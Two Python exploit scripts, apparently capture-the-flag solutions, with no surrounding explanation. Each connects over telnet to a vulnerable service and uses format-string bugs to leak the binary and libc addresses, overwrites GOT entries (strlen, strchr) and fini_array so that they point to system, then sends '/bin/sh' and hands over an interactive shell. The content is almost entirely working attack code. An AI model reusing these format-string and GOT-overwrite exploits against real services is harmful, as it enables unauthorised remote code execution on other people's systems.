def main(): # GOT Overrite system_plt = 0x08048490 strlen_got = 0x08049a54 fini_array = 0x08049934 main = 0x080485ed ret2main = '%19$08xx' tn = telnetlib.Telnet(HOST, PORT) p = FormatStr() p[fini_array] = [main] p[strlen_got] = [system_plt] payload = p.payload(12, 2, len('Nice to meet you, ')) payload += b'\n' tn.read_until(b'name... ') tn.write(payload) tn.read_until(b'name... ') tn.write(b'/bin/sh\n') tn.interact()
def main(): coordinates = '51.492137,-0.192878 ' libc_setsockopt_offset = 0xea8e0 libc_system_offset = 0x3af40 libc_binsh_offset = 0x15ef08 strchr_got_offset = 0x505c tn = Telnet(HOST, PORT) stage = 0 while stage < 5: try: game(tn) stage += 1 except: del(tn) tn = Telnet(HOST, PORT) stage = 0 tn.read_until(b'TARDIS KEY: ') tn.write(b'UeSlhCAGEp\n') tn.read_until(b'Selection: ') tn.write(b'11111111\x00') print('wait for alarm') time.sleep(3) tn.write(struct.pack('L', 1431907181)) tn.write(b'11111111\xff') tn.write(b'1\n') tn.read_until(b'Selection: ') tn.write(b'3\n') tn.read_until(b'Coordinates: ') tn.write(coordinates.encode()) tn.write('zzz%{}$p\n'.format(int((0xff8ce05c-0xff8cdc0c)/4-1)).encode()) tn.read_until(b'zzz') base_addr = int(tn.read_some()[0:10].decode(), 16) - 0x1491 print('base addr : {}'.format(hex(base_addr))) tn.read_until(b'Coordinates: ') tn.write(coordinates.encode()) tn.write(b'zzzz') tn.write(struct.pack('<I', base_addr+0x500c)) tn.write(b'%21$s\n') tn.read_until(b'zzzz') setsockopt_addr = struct.unpack('<I', tn.read_some()[4:8])[0] print('setsockopt :{}'.format(hex(setsockopt_addr))) libc_system = setsockopt_addr - (libc_setsockopt_offset - libc_system_offset) libc_binsh = setsockopt_addr - (libc_setsockopt_offset - libc_binsh_offset) print('system :{}'.format(hex(libc_system))) strchr_got = base_addr + strchr_got_offset print('strchr_got :{}'.format(hex(strchr_got))) p = FormatStr() p[strchr_got] = libc_system - 0x14 - 0x140000 tn.write(coordinates.encode()) tn.write(p.payload(20) + b'\n') tn.read_until(b'Coordinates: ') tn.read_until(b'Coordinates: ') tn.write(b'/bin/sh\n') tn.interact()